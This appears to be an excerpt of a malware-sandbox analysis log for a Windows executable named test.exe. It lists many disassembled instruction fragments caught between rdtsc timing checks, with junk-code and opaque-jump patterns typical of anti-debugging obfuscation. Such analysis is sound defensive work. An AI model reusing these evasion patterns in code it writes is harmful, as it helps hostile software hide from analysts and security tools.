              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E7994F second address: E79958 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E79958 second address: E79964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F403D12A5B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E7A05F second address: E7A066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E7A066 second address: E7A06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E7A06C second address: E7A071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E7DB02 second address: E7DB3E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F403D12A5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 7EBD73EDh 0x00000012 or dword ptr [ebp+122D368Ah], ecx 0x00000018 lea ebx, dword ptr [ebp+12451991h] 0x0000001e add esi, dword ptr [ebp+122D379Ah] 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 je 00007F403D12A5B6h 0x0000002e jmp 00007F403D12A5BDh 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E7DB3E second address: E7DB53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F403C75C900h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E7DBAB second address: E7DBB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E7DBB3 second address: E7DC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F403C75C8F6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 jno 00007F403C75C8FCh 0x00000017 mov ecx, dword ptr [ebp+122D380Ah] 0x0000001d push 6BDDE3F3h 0x00000022 pushad 0x00000023 jmp 00007F403C75C906h 0x00000028 jp 00007F403C75C90Bh 0x0000002e popad 0x0000002f xor dword ptr [esp], 6BDDE373h 0x00000036 mov di, cx 0x00000039 push 00000003h 0x0000003b call 00007F403C75C8FBh 0x00000040 pushad 0x00000041 mov dword ptr [ebp+122D3098h], edi 0x00000047 mov dword ptr [ebp+122D3014h], ecx 0x0000004d popad 0x0000004e pop ecx 0x0000004f push 00000000h 0x00000051 mov edx, dword ptr [ebp+122D3A1Eh] 0x00000057 push 00000003h 0x00000059 stc 0x0000005a push FBACFDDFh 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push edi 0x00000064 pop edi 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E7DC4A second address: E7DC5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E7DD30 second address: E7DD34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E7DD34 second address: E7DDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 4FC951AAh 0x0000000e xor dword ptr [ebp+122D29D5h], eax 0x00000014 push 00000003h 0x00000016 add esi, dword ptr [ebp+122D38EEh] 0x0000001c push 00000000h 0x0000001e movzx edx, cx 0x00000021 mov si, ax 0x00000024 push 00000003h 0x00000026 pushad 0x00000027 ja 00007F403D12A5BCh 0x0000002d mov dword ptr [ebp+122D1C45h], eax 0x00000033 popad 0x00000034 push E4EECDB1h 0x00000039 je 00007F403D12A5C9h 0x0000003f pushad 0x00000040 pushad 0x00000041 popad 0x00000042 jmp 00007F403D12A5BFh 0x00000047 popad 0x00000048 xor dword ptr [esp], 24EECDB1h 0x0000004f push 00000000h 0x00000051 push esi 0x00000052 call 00007F403D12A5B8h 0x00000057 pop esi 0x00000058 mov dword ptr [esp+04h], esi 0x0000005c add dword ptr [esp+04h], 0000001Dh 0x00000064 inc esi 0x00000065 push esi 0x00000066 ret 0x00000067 pop esi 0x00000068 ret 0x00000069 clc 0x0000006a mov esi, dword ptr [ebp+122D37BAh] 0x00000070 lea ebx, dword ptr [ebp+124519A5h] 0x00000076 mov ch, ah 0x00000078 push eax 0x00000079 jbe 00007F403D12A5C0h 0x0000007f pushad 0x00000080 push eax 0x00000081 pop eax 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E5E037 second address: E5E04E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C903h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E5E04E second address: E5E089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push esi 0x00000008 jmp 00007F403D12A5C8h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F403D12A5C3h 0x00000014 jns 00007F403D12A5B6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E9AE8D second address: E9AEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403C75C904h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E9AEA5 second address: E9AEA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E9AEA9 second address: E9AEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E9AEB7 second address: E9AEBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E9AEBB second address: E9AEC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9AEC1 second address: E9AECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F403D12A5B6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9AECD second address: E9AEE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C907h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B466 second address: E9B470 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F403D12A5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B470 second address: E9B49D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F403C75C8FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c jp 00007F403C75C8F6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 jmp 00007F403C75C8FFh 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B49D second address: E9B4A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B84F second address: E9B855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B855 second address: E9B870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403D12A5C7h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B870 second address: E9B89B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F403C75C909h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F403C75C8F6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B89B second address: E9B89F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B89F second address: E9B8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F403C75C902h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F403C75C905h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F403C75C907h 0x00000018 jmp 00007F403C75C904h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9B8FB second address: E9B900 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BA80 second address: E9BAA4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F403C75C8FCh 0x00000008 jnc 00007F403C75C8F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F403C75C900h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BBEA second address: E9BBEF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BBEF second address: E9BC14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F403C75C90Ah 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BC14 second address: E9BC1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BC1A second address: E9BC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BC1E second address: E9BC22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BED7 second address: E9BEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9BEDD second address: E9BEE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9CB4A second address: E9CB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F403C75C8FDh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E9CB66 second address: E9CB6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E7549E second address: E754B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F403C75C8F6h 0x0000000d jg 00007F403C75C8F6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E754B1 second address: E754C1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F403D12A5B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: E754C1 second address: E754C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EA5830 second address: EA5846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F403D12A5BCh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EA80A1 second address: EA80A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EABB96 second address: EABBA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jne 00007F403D12A5B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EABCD3 second address: EABCDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F403C75C8F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EABCDE second address: EABCE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EABCE4 second address: EABCEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EABCEF second address: EABCF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EAC234 second address: EAC238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EACB07 second address: EACB4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jne 00007F403D12A5B8h 0x00000011 push edi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop edi 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push edi 0x0000001b js 00007F403D12A5BCh 0x00000021 jnc 00007F403D12A5B6h 0x00000027 pop edi 0x00000028 mov eax, dword ptr [eax] 0x0000002a push eax 0x0000002b push edx 0x0000002c push ecx 0x0000002d pushad 0x0000002e popad 0x0000002f pop ecx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EACCD5 second address: EACCD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EACCD9 second address: EACCDF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EACCDF second address: EACCE9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F403C75C8FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EACE80 second address: EACEA8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F403D12A5BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jmp 00007F403D12A5C3h 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EACEA8 second address: EACEBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F403C75C8FFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EAD03D second address: EAD041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EAD7B1 second address: EAD7FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F403C75C8F8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 nop 0x00000026 push esi 0x00000027 jp 00007F403C75C8FCh 0x0000002d pop esi 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F403C75C8FDh 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EAD8E6 second address: EAD91B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007F403D12A5D5h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F403D12A5C3h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EAD91B second address: EAD91F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EADA6D second address: EADA77 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F403D12A5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EADA77 second address: EADA7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB0065 second address: EB006A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB0184 second address: EB01F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F403C75C8F6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F403C75C8F8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov edi, 19384EA1h 0x00000030 mov edi, dword ptr [ebp+122D28AAh] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F403C75C8F8h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 00000018h 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 mov dword ptr [ebp+122D20B0h], ecx 0x00000058 push 00000000h 0x0000005a mov esi, dword ptr [ebp+122D1D25h] 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB1E54 second address: EB1E5D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB28ED second address: EB2908 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB2908 second address: EB2961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F403D12A5C5h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F403D12A5B8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 xor esi, dword ptr [ebp+122D26D3h] 0x0000002d push 00000000h 0x0000002f mov edi, dword ptr [ebp+122D3822h] 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D2A96h], ecx 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB2961 second address: EB2965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB2965 second address: EB296B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB296B second address: EB2971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB2971 second address: EB2975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB3305 second address: EB336E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F403C75C8F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c jne 00007F403C75C8F9h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F403C75C8F8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F403C75C8F8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a xchg eax, ebx 0x0000004b jp 00007F403C75C904h 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB336E second address: EB3372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB3372 second address: EB337F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB337F second address: EB3385 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB3385 second address: EB338F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F403C75C8F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB45D9 second address: EB45DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB517C second address: EB5182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB5182 second address: EB51A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F403D12A5C8h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB80A5 second address: EB80C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F403C75C909h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB8683 second address: EB8688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB8688 second address: EB868E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: EB9522 second address: EB9528 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
